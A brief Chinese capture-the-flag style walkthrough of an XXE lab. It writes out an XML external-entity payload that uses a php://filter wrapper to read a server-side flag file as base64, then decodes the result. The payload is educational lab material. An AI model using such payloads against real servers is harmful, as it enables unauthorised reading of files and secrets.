XXE-Lab靶场漏洞复现

1.尝试登录

输入账号admin/密码admin进行登录,并未有页面进行跳转

2.尝试抓包分析请求包数据

我们可以发现页面中存在xml请求,我们就可以构造我们的xml请求语句来获取想要的数据

3.构造语句

复制代码
<?xml version="1.0" ?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=c:/flag/flag">
]>
&xxe;

这里我们需要将xml语句放入post请求体中并发送

如上图所示便是我们需要获取的数据

4.数据解码

将获取的数据进行解码后我们即可得到我们的flag

flag{dmsioamdoiasdmdmwmdsmd}

相关推荐
AFinalStone5 分钟前
Android 7系统无障碍服务(一)全景图与架构概览
android·无障碍服务
Android-Flutter8 分钟前
android 自定义view 详解
android·kotlin
WAsbry42 分钟前
协程任务的失败控制:取消、异常传播与Supervisor
android
Android打工仔1 小时前
从 finally 理解程序的控制流:它为什么不是 catch 后面的代码?
android·kotlin
随遇丿而安1 小时前
第15周:Service 全功能 + 后台优化
android
YXL1111YXL1 小时前
续体和状态机 —— suspend 函数的 CPS 变换
android·kotlin
WAsbry1 小时前
Flow数据模型:冷流、状态、事件与共享策略
android
WAsbry1 小时前
深入理解 Kotlin suspend:挂起语义、状态机与恢复调度
android
WAsbry1 小时前
Flow在Android中的完整落地:异常、重试与生命周期
android
WAsbry1 小时前
协程共享状态:Atomic、Mutex、Semaphore与状态封闭
android